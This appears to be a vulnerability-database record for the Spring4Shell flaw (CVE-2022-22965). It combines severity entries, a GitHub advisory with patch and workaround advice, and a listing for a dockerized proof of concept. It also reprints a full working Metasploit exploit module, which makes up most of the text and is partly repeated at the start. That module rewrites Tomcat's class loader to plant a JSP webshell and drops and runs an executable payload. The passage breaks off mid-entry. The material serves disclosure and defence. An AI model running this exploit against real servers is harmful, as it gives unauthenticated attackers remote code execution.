\"#{cl_prefix}.resources.context.parent.pipeline.first.directory\" => opts[:directory],\n \"#{cl_prefix}.resources.context.parent.pipeline.first.prefix\" => opts[:prefix],\n \"#{cl_prefix}.resources.context.parent.pipeline.first.suffix\" => opts[:suffix],\n \"#{cl_prefix}.resources.context.parent.pipeline.first.fileDateFormat\" => opts[:file_date_format]\n }\n })\n end\n\n def check_log_file\n print_status(\"#{peer} - Waiting for the server to flush the logfile\")\n print_status(\"#{peer} - Executing JSP payload at #{full_uri(@jsp_file)}\")\n\n succeeded = retry_until_truthy(timeout: 60) do\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(@jsp_file)\n })\n\n res&.code == 200 && !res.body.blank?\n end\n\n fail_with(Failure::UnexpectedReply, \"Seems the payload hasn't been written\") unless succeeded\n\n print_good(\"#{peer} - Log file flushed\")\n end\n\n # Fix the JSP payload to make it valid once is dropped\n # to the log file\n def fix(jsp)\n output = ''\n jsp.each_line do |l|\n if l =~ /<%.*%>/\n output << l\n elsif l =~ /<%/\n next\n elsif l =~ /%>/\n next\n elsif l.chomp.empty?\n next\n else\n output << \"<% #{l.chomp} %>\"\n end\n end\n output\n end\n\n def create_jsp\n jsp = <<~EOS\n <%\n File jsp=new File(getServletContext().getRealPath(File.separator) + File.separator + \"#{@jsp_file}\");\n jsp.delete();\n %>\n #{Faker::Internet.uuid}\n EOS\n if target['Arch'] == ARCH_JAVA\n jsp << fix(payload.encoded)\n else\n payload_exe = generate_payload_exe\n payload_filename = rand_text_alphanumeric(rand(4..7))\n\n if target['Platform'] == 'win'\n payload_path = datastore['WritableDir'] + '\\\\' + payload_filename\n else\n payload_path = datastore['WritableDir'] + '/' + payload_filename\n end\n\n jsp << jsp_dropper(payload_path, payload_exe)\n register_files_for_cleanup(payload_path)\n end\n\n jsp\n end\n\n def check\n @checkcode = _check\n end\n\n def _check\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(Rex::Text.rand_text_alpha_lower(4..6))\n )\n\n return CheckCode::Unknown('Web server seems unresponsive') unless res\n\n if res.headers.key?('Server')\n res.headers['Server'].match(%r{(.*)/([\\d|.]+)$})\n else\n res.body.match(%r{Apache\\s(.*)/([\\d|.]+)})\n end\n\n server = Regexp.last_match(1) || nil\n version = Rex::Version.new(Regexp.last_match(2)) || nil\n\n return Exploit::CheckCode::Safe('Application does not seem to be running under Tomcat') unless server && server.match(/Tomcat/)\n\n vprint_status(\"Detected #{server} #{version} running\")\n\n if datastore['HTTP_METHOD'] == 'Automatic'\n # prefer POST over get to keep the vars out of the query string if possible\n methods = %w[POST GET]\n else\n methods = [ datastore['HTTP_METHOD'] ]\n end\n\n methods.each do |method|\n vars = \"vars_#{method == 'GET' ? 'get' : 'post'}\"\n res = send_request_cgi(\n 'method' => method,\n 'uri' => normalize_uri(datastore['TARGETURI']),\n vars => { 'class.module.classLoader.DefaultAssertionStatus' => Rex::Text.rand_text_alpha_lower(4..6) }\n )\n\n # setting the default assertion status to a valid status\n send_request_cgi(\n 'method' => method,\n 'uri' => normalize_uri(datastore['TARGETURI']),\n vars => { 'class.module.classLoader.DefaultAssertionStatus' => 'true' }\n )\n return Exploit::CheckCode::Appears(details: { method: method }) if res.code == 400\n end\n\n Exploit::CheckCode::Safe\n end\n\n def exploit\n prefix_jsp = rand_text_alphanumeric(rand(3..5))\n date_format = rand_text_numeric(rand(1..4))\n @jsp_file = prefix_jsp + date_format + '.jsp'\n http_method = datastore['HTTP_METHOD']\n if http_method == 'Automatic'\n # if the check was skipped but we need to automatically identify the method, we have to run it here\n @checkcode = check if @checkcode.nil?\n http_method = @checkcode.details[:method]\n fail_with(Failure::BadConfig, 'Failed to automatically identify the HTTP method') if http_method.blank?\n\n print_good(\"Automatically identified HTTP method: #{http_method}\")\n end\n\n # if the check method ran automatically, add a short delay before continuing with exploitation\n sleep(5) if @checkcode\n\n # Prepare the JSP\n print_status(\"#{peer} - Generating JSP...\")\n\n # rubocop:disable Style/FormatStringToken\n jsp = create_jsp.gsub('<%', '%{c1}i').gsub('%>', '%{c2}i')\n # rubocop:enable Style/FormatStringToken\n\n # Modify the Class Loader\n print_status(\"#{peer} - Modifying Class Loader...\")\n properties = {\n payload: jsp,\n directory: datastore['PAYLOAD_PATH'],\n prefix: prefix_jsp,\n suffix: '.jsp',\n file_date_format: date_format\n }\n res = modify_class_loader(http_method, properties)\n unless res\n fail_with(Failure::TimeoutExpired, \"#{peer} - No answer\")\n end\n\n # No matter what happened, try to 'restore' the Class Loader\n properties = {\n payload: '',\n directory: '',\n prefix: '',\n suffix: '',\n file_date_format: ''\n }\n\n modify_class_loader(http_method, properties)\n\n check_log_file\n\n handler\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/spring_framework_rce_spring4shell.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "cisa_kev": [{"lastseen": "2023-12-03T16:07:25", "description": "Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-04T00:00:00", "type": "cisa_kev", "title": "Spring Framework JDK 9+ Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-04T00:00:00", "id": "CISA-KEV-CVE-2022-22965", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2023-12-03T17:19:00", "description": "Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions when running on JDK 9 or above and specifically packaged as a traditional WAR and deployed in a standalone Tomcat instance are vulnerable to remote code execution due to an unsafe data binding used to populate an object from request parameters to set a Tomcat specific ClassLoader. By crafting a request to the application and referencing the org.apache.catalina.valves.AccessLogValve class through the classLoader with parameters such as the following: class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp, an unauthenticated attacker can gain remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-10T00:00:00", "type": "zdt", "title": "Spring4Shell Spring Framework Class Property Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-05-10T00:00:00", "id": "1337DAY-ID-37692", "href": "https://0day.today/exploit/description/37692", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ManualRanking # It's going to manipulate the Class Loader\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::FileDropper\n include Msf::Exploit::EXE\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Spring Framework Class property RCE (Spring4Shell)',\n 'Description' => %q{\n Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions when running on JDK 9 or above\n and specifically packaged as a traditional WAR and deployed in a standalone Tomcat instance are vulnerable\n to remote code execution due to an unsafe data binding used to populate an object from request parameters\n to set a Tomcat specific ClassLoader. By crafting a request to the application and referencing the\n org.apache.catalina.valves.AccessLogValve class through the classLoader with parameters such as the following:\n class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp, an unauthenticated attacker can\n gain remote code execution.\n },\n 'Author' => [\n 'vleminator <vleminator[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' => [\n ['CVE', '2022-22965'],\n ['URL', 'https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement'],\n ['URL', 'https://github.com/spring-projects/spring-framework/issues/28261'],\n ['URL', 'https://tanzu.vmware.com/security/cve-2022-22965']\n ],\n 'Platform' => %w[linux win],\n 'Payload' => {\n 'Space' => 5000,\n 'DisableNops' => true\n },\n 'Targets' => [\n [\n 'Java',\n {\n 'Arch' => ARCH_JAVA,\n 'Platform' => %w[linux win]\n },\n ],\n [\n 'Linux',\n {\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Platform' => 'linux'\n }\n ],\n [\n 'Windows',\n {\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Platform' => 'win'\n }\n ]\n ],\n 'DisclosureDate' => '2022-03-31',\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'AKA' => ['Spring4Shell', 'SpringShell'],\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options(\n [\n Opt::RPORT(8080),\n OptString.new('TARGETURI', [ true, 'The path to the application action', '/app/example/HelloWorld.action']),\n OptString.new('PAYLOAD_PATH', [true, 'Path to write the payload', 'webapps/ROOT']),\n OptEnum.new('HTTP_METHOD', [false, 'HTTP method to use', 'Automatic', ['Automatic', 'GET', 'POST']]),\n ]\n )\n register_advanced_options [\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def jsp_dropper(file, exe)\n # The sun.misc.BASE64Decoder.decodeBuffer API is no longer available in Java 9.\n dropper = <<~EOS\n <%@ page import=\\\"java.io.FileOutputStream\\\" %>\n <%@ page import=\\\"java.util.Base64\\\" %>\n <%@ page import=\\\"java.io.File\\\" %>\n <%\n FileOutputStream oFile = new FileOutputStream(\\\"#{file}\\\", false);\n oFile.write(Base64.getDecoder().decode(\\\"#{Rex::Text.encode_base64(exe)}\\\"));\n oFile.flush();\n oFile.close();\n File f = new File(\\\"#{file}\\\");\n f.setExecutable(true);\n Runtime.getRuntime().exec(\\\"#{file}\\\");\n %>\n EOS\n\n dropper\n end\n\n def modify_class_loader(method, opts)\n cl_prefix = 'class.module.classLoader'\n\n send_request_cgi({\n 'uri' => normalize_uri(target_uri.path.to_s),\n 'version' => '1.1',\n 'method' => method,\n 'headers' => {\n 'c1' => '<%', # %{c1}i replacement in payload\n 'c2' => '%>' # %{c2}i replacement in payload\n },\n \"vars_#{method == 'GET' ? 'get' : 'post'}\" => {\n \"#{cl_prefix}.resources.context.parent.pipeline.first.pattern\" => opts[:payload],\n \"#{cl_prefix}.resources.context.parent.pipeline.first.directory\" => opts[:directory],\n \"#{cl_prefix}.resources.context.parent.pipeline.first.prefix\" => opts[:prefix],\n \"#{cl_prefix}.resources.context.parent.pipeline.first.suffix\" => opts[:suffix],\n \"#{cl_prefix}.resources.context.parent.pipeline.first.fileDateFormat\" => opts[:file_date_format]\n }\n })\n end\n\n def check_log_file\n print_status(\"#{peer} - Waiting for the server to flush the logfile\")\n print_status(\"#{peer} - Executing JSP payload at #{full_uri(@jsp_file)}\")\n\n succeeded = retry_until_true(timeout: 60) do\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(@jsp_file)\n })\n\n res&.code == 200 && !res.body.blank?\n end\n\n fail_with(Failure::UnexpectedReply, \"Seems the payload hasn't been written\") unless succeeded\n\n print_good(\"#{peer} - Log file flushed\")\n end\n\n # Fix the JSP payload to make it valid once is dropped\n # to the log file\n def fix(jsp)\n output = ''\n jsp.each_line do |l|\n if l =~ /<%.*%>/\n output << l\n elsif l =~ /<%/\n next\n elsif l =~ /%>/\n next\n elsif l.chomp.empty?\n next\n else\n output << \"<% #{l.chomp} %>\"\n end\n end\n output\n end\n\n def create_jsp\n jsp = <<~EOS\n <%\n File jsp=new File(getServletContext().getRealPath(File.separator) + File.separator + \"#{@jsp_file}\");\n jsp.delete();\n %>\n #{Faker::Internet.uuid}\n EOS\n if target['Arch'] == ARCH_JAVA\n jsp << fix(payload.encoded)\n else\n payload_exe = generate_payload_exe\n payload_filename = rand_text_alphanumeric(rand(4..7))\n\n if target['Platform'] == 'win'\n payload_path = datastore['WritableDir'] + '\\\\' + payload_filename\n else\n payload_path = datastore['WritableDir'] + '/' + payload_filename\n end\n\n jsp << jsp_dropper(payload_path, payload_exe)\n register_files_for_cleanup(payload_path)\n end\n\n jsp\n end\n\n def check\n @checkcode = _check\n end\n\n def _check\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(Rex::Text.rand_text_alpha_lower(4..6))\n )\n\n return CheckCode::Unknown('Web server seems unresponsive') unless res\n\n if res.headers.key?('Server')\n res.headers['Server'].match(%r{(.*)/([\\d|.]+)$})\n else\n res.body.match(%r{Apache\\s(.*)/([\\d|.]+)})\n end\n\n server = Regexp.last_match(1) || nil\n version = Rex::Version.new(Regexp.last_match(2)) || nil\n\n return Exploit::CheckCode::Safe('Application does not seem to be running under Tomcat') unless server && server.match(/Tomcat/)\n\n vprint_status(\"Detected #{server} #{version} running\")\n\n if datastore['HTTP_METHOD'] == 'Automatic'\n # prefer POST over get to keep the vars out of the query string if possible\n methods = %w[POST GET]\n else\n methods = [ datastore['HTTP_METHOD'] ]\n end\n\n methods.each do |method|\n vars = \"vars_#{method == 'GET' ? 'get' : 'post'}\"\n res = send_request_cgi(\n 'method' => method,\n 'uri' => normalize_uri(datastore['TARGETURI']),\n vars => { 'class.module.classLoader.DefaultAssertionStatus' => Rex::Text.rand_text_alpha_lower(4..6) }\n )\n\n # setting the default assertion status to a valid status\n send_request_cgi(\n 'method' => method,\n 'uri' => normalize_uri(datastore['TARGETURI']),\n vars => { 'class.module.classLoader.DefaultAssertionStatus' => 'true' }\n )\n return Exploit::CheckCode::Appears(details: { method: method }) if res.code == 400\n end\n\n Exploit::CheckCode::Safe\n end\n\n def exploit\n prefix_jsp = rand_text_alphanumeric(rand(3..5))\n date_format = rand_text_numeric(rand(1..4))\n @jsp_file = prefix_jsp + date_format + '.jsp'\n http_method = datastore['HTTP_METHOD']\n if http_method == 'Automatic'\n # if the check was skipped but we need to automatically identify the method, we have to run it here\n @checkcode = check if @checkcode.nil?\n http_method = @checkcode.details[:method]\n fail_with(Failure::BadConfig, 'Failed to automatically identify the HTTP method') if http_method.blank?\n\n print_good(\"Automatically identified HTTP method: #{http_method}\")\n end\n\n # if the check method ran automatically, add a short delay before continuing with exploitation\n sleep(5) if @checkcode\n\n # Prepare the JSP\n print_status(\"#{peer} - Generating JSP...\")\n\n # rubocop:disable Style/FormatStringToken\n jsp = create_jsp.gsub('<%', '%{c1}i').gsub('%>', '%{c2}i')\n # rubocop:enable Style/FormatStringToken\n\n # Modify the Class Loader\n print_status(\"#{peer} - Modifying Class Loader...\")\n properties = {\n payload: jsp,\n directory: datastore['PAYLOAD_PATH'],\n prefix: prefix_jsp,\n suffix: '.jsp',\n file_date_format: date_format\n }\n res = modify_class_loader(http_method, properties)\n unless res\n fail_with(Failure::TimeoutExpired, \"#{peer} - No answer\")\n end\n\n # No matter what happened, try to 'restore' the Class Loader\n properties = {\n payload: '',\n directory: '',\n prefix: '',\n suffix: '',\n file_date_format: ''\n }\n\n modify_class_loader(http_method, properties)\n\n check_log_file\n\n handler\n end\n\n # Retry the block until it returns a truthy value. Each iteration attempt will\n # be performed with expoential backoff. If the timeout period surpasses, false is returned.\n def retry_until_true(timeout:)\n start_time = Process.clock_gettime(Process::CLOCK_MONOTONIC, :second)\n ending_time = start_time + timeout\n retry_count = 0\n while Process.clock_gettime(Process::CLOCK_MONOTONIC, :second) < ending_time\n result = yield\n return result if result\n\n retry_count += 1\n remaining_time_budget = ending_time - Process.clock_gettime(Process::CLOCK_MONOTONIC, :second)\n break if remaining_time_budget <= 0\n\n delay = 2**retry_count\n if delay >= remaining_time_budget\n delay = remaining_time_budget\n vprint_status(\"Final attempt. Sleeping for the remaining #{delay} seconds out of total timeout #{timeout}\")\n else\n vprint_status(\"Sleeping for #{delay} seconds before attempting again\")\n end\n\n sleep delay\n end\n\n false\n end\nend\n", "sourceHref": "https://0day.today/exploit/37692", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "github": [{"lastseen": "2023-12-03T17:28:12", "description": "Spring Framework prior to versions 5.2.20 and 5.3.18 contains a remote code execution vulnerability known as `Spring4Shell`. \n\n## Impact\n\nA Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it.\n\nThese are the prerequisites for the exploit:\n- JDK 9 or higher\n- Apache Tomcat as the Servlet container\n- Packaged as WAR\n- `spring-webmvc` or `spring-webflux` dependency\n\n## Patches\n\n- Spring Framework [5.3.18](https://github.com/spring-projects/spring-framework/releases/tag/v5.3.18) and [5.2.20](https://github.com/spring-projects/spring-framework/releases/tag/v5.2.20.RELEASE)\n- Spring Boot [2.6.6](https://github.com/spring-projects/spring-boot/releases/tag/v2.6.6) and [2.5.12](https://github.com/spring-projects/spring-boot/releases/tag/v2.5.12)\n\n## Workarounds\n\nFor those who are unable to upgrade, leaked reports recommend setting `disallowedFields` on `WebDataBinder` through an `@ControllerAdvice`. This works generally, but as a centrally applied workaround fix, may leave some loopholes, in particular if a controller sets `disallowedFields` locally through its own `@InitBinder` method, which overrides the global setting.\n\nTo apply the workaround in a more fail-safe way, applications could extend `RequestMappingHandlerAdapter` to update the `WebDataBinder` at the end after all other initialization. In order to do that, a Spring Boot application can declare a `WebMvcRegistrations` bean (Spring MVC) or a `WebFluxRegistrations` bean (Spring WebFlux).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T18:30:50", "type": "github", "title": "Remote Code Execution in Spring Framework", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2023-01-31T05:04:23", "id": "GHSA-36P3-WJMG-H94X", "href": "https://github.com/advisories/GHSA-36p3-wjmg-h94x", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "kitploit": [{"lastseen": "2023-12-03T16:47:17", "description": "[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaq3n6pTYJadYNCpjVegHxZFc8ZwiZUtKbPgpxPlbSd7vQgjUEfKFw0cO8jrAjpHsv_tzZAG_chVh9Mwrrh9UpIHbkniKAjKptmjj-rJ2uOjSxvBrPfVn3H2AZpIjCO-1Lrt4HnOxh7SS5SrMbbIttLpUzw7xDtIat1yKhbVk_0JgC8RDhwEXTMEuY/s745/Spring4Shell.png>)\n\n \n\n\nThis is a dockerized application that is [vulnerable](<https://www.kitploit.com/search/label/Vulnerable> \"vulnerable\" ) to the Spring4Shell [vulnerability](<https://www.kitploit.com/search/label/Vulnerability> \"vulnerability\" ) (CVE-2022-22965). Full Java source for the war is provided and modifiable, the war will get re-built whenever the docker image is built. The built WAR will then be loaded by Tomcat. There is nothing special about this application, it's a simple hello world that's based off [Spring tutorials](<https://spring.io/guides/gs/handling-form-submission/> \"Spring tutorials\" ).\n\nDetails: <https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities>\n\nHaving issues with the POC? Check out the LunaSec fork at: <https://github.com/lunasec-io/Spring4Shell-POC>, it's more actively maintained.\n\n## Requirements\n\n 1. Docker\n 2. Python3 + requests library\n\n## Instructions\n\n 1. Clone the repository\n 2. Build and run the container: `docker build . -t spring4shell && docker run -p 8080:8080 spring4shell`\n 3. App should now be available at <http://localhost:8080/helloworld/greeting>\n\n[](<https://github.com/reznok/Spring4Shell-POC/blob/master/screenshots/webpage.png?raw=true> \"Dockerized Spring4Shell \\(CVE-2022-22965\\) PoC application and exploit \\(7\\)\" )[](<https://blogger.googleusercontent.com/img/a/AVvXsEgiSKKOBdAf-H6x6nvFmF2wHQ0WkAKdimGQcO3ortF_UVrOhKDkUDmIr4gxFzpaEaodNjEbpOo2z05EuGygz6K7atd6sXZYvXGfs60tMvLY5ZPxKOwuFrODicy7AbrL7kskqnDMETdZ2FPvJ1mD0gw2LxfG-qch-LSC8tBo7hIW-JM4Jj9jGhkehhhD>)\n\n 4. Run the exploit.py script: `python exploit.py --url \"http://localhost:8080/helloworld/greeting\"`\n\n[](<https://github.com/reznok/Spring4Shell-POC/blob/master/screenshots/runexploit_2.png?raw=true> \"Dockerized Spring4Shell \\(CVE-2022-22965\\) PoC application and exploit \\(8\\)\" )[](<https://blogger.googleusercontent.com/img/a/AVvXsEhXbcvigqvcJMzQzqHzuPqv8kDD2hEASz5zefNLhrnslPL6PVh8EdqWR0NFrOVdonBf7kBvzydhbiiPpBmFXSQun215RFALW4ijb3ucOIgmJKqELuISNRn59h8q-FHSlsEeoc594Ns_vIAkKrrogsoVbif_ufTU9Udrr2Umykdeyz9b0o3y5DkRXVhj>)\n\n 5. Visit the created webshell! Modify the `cmd` GET parameter for your commands. (`http://localhost:8080/shell.jsp` by default)\n\n[](<https://github.com/reznok/Spring4Shell-POC/blob/master/screenshots/RCE.png?raw=true> \"Dockerized Spring4Shell \\(CVE-2022-22965\\) PoC application and exploit \\(9\\)\" )[](<https://blogger.googleusercontent.com/img/a/AVvXsEgTxfQevfT3YeenETl-w22eGNM_pdTzRn-0Nr0fwMbrmE7CLOkf33fpWA0N4zEloY3M1qI7ja7sQ-MziwLKY0FoiMoJ1e1kPhHSTMnyCU8L358ZRZTXcLmZDM7U9FHf7YuvY_3Nu3l17zdYcxQC4C9UgkypJ82wWMrgZt1jZ1cS_-2kOH7GfPdZgu6F>)\n\n## Notes\n\n**Fixed!** ~~As of this writing, the [container](<https://www.kitploit.com/search/label/Container> \"container\" ) (possibly just Tomcat) must be restarted between exploitations. I'm actively trying to resolve this.~~\n\nRe-running the exploit will create an extra artifact file of {old_filename}_.jsp.\n\nPRs/DMs [@Rezn0k](<https://twitter.com/rezn0k> \"@Rezn0k\" ) are welcome for improvements!\n\n## Credits\n\n * [@esheavyind](<https://twitter.com/esheavyind> \"@esheavyind\" ) for help on building a PoC. Check out their writeup at: <https://gist.github.com/esell/c9731a7e2c5404af7716a6810dc33e1a>\n * [@LunaSecIO](<https://twitter.com/LunaSecIO> \"@LunaSecIO\" ) for improving the documentation and exploit\n * [@rwincey](<https://twitter.com/rwincey> \"@rwincey\" ) for making the exploit replayable without requiring a [Tomcat](<https://www.kitploit.com/search/label/Tomcat> \"Tomcat\" ) restart\n \n \n\n\n**[Download Spring4Shell-POC](<https://github.com/reznok/Spring4Shell-POC> \"Download Spring4Shell-POC\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-10T12:30:00", "type": "kitploit", "title": "Spring4Shell-POC - Dockerized Spring4Shell (CVE-2022-22965) PoC Application And Exploit", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-05-10T12:30:00", "id": "KITPLOIT:3050371869908791295", "href": "http://www.kitploit.com/2022/05/spring4shell-poc-dockerized.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T16:47:19", "description": "# [](<https://blogger.googleusercontent.com/img/a/AVvXsEiq83rixQ33OKbmoWJi89WYHdc4DrLKjaF4Fb_oNC9eI-0dinGfghgU-ON86t-dvUArvvR4Uytjd8t4wjK3r0hSR6SojDsdxtk5oTYh9zXEVVj_Vwr5Jv4R77tpdZamnECE8jW0wK86UlAO3xZNSDsr5XlvkezzB-JxjKcV1r204vACkoGhTZ5kDzKX>)\n\n#### \n\n\n#### A fully automated, reliable, and accurate scanner for finding Spring4Shell and Spring Cloud RCE vulnerabilities\n\n[](<https://cam